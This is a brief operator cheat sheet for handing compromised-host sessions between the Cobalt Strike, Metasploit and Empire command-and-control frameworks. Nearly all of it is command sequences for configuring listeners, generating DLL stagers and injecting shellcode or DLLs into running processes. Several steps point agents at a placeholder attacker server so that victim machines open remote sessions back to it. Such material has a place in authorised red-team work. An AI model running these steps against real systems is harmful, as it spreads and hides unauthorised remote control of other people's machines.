Cobalt Strike to:
Metasploit
- Set up a listener in Metasploit.
- In Cobalt Strike, set up a foreign listener (such as windows/foreign/http), using the Metasploit server’s info for host and port. The listener can then be used for any command or action that takes a listener parameter, such as spawn and spawnas.
Empire
In Empire, set up a listener. Then:
- usestager dll
- set Listener <listener-name>
- generate
- (Note the OutFile path)
- In your Beacon session in Cobalt Strike, run ps to find a suitable process ID to inject into, then run:
- dllinject <pid> <OutFile path>
Empire to:
Cobalt Strike
- In Cobalt Strike, set up an http beacon listener
In Empire:
- use listeners
- set Type meter
- set Host http://COBALT-SERVER-IP:PORT-OF-BEACON-LISTENER
- set Name cobalt
- agents
- interact <agent name>
- usemodule code_execution/invoke_shellcode
- set Listener cobalt
- execute
Metasploit
- In Metasploit, set up a reverse http meterpreter listener
In Empire:
- use listeners
- set Type meter
- set Host http://MSF-SERVER-IP:PORT-OF-MSF-LISTENER
- set Name meterpreter
- agents
- interact <agent name>
- usemodule code_execution/invoke_shellcode
- set Listener meterpreter
- execute
Metasploit to:
Cobalt Strike
- Cobalt Strike can stage using any Metasploit module with the Payload option. Set the payload to match your Cobalt Strike listener’s type (i.e., http or https) and use your team server’s IP and port for the LHOST and LPORT settings.
- To spawn a Beacon session from an existing Meterpreter session, use exploit/windows/local/payload_inject. Set DisablePayloadHandler True.
Empire
- In Empire, set up a listener. Then:
- usestager dll
- set Listener <listener-name>
- generate
- (Note the OutFile path)
- In MSF:
- use post/windows/manage/reflective_dll_inject
- set path <OutFile path>
- set session <session-number>
- Interact with the session to run ps and get a PID to inject into
- set pid <pid>
- run
References:
http://www.sixdub.net/?p=627
http://blog.cobaltstrike.com/2016/01/05/interoperability-with-the-metasploit-framework/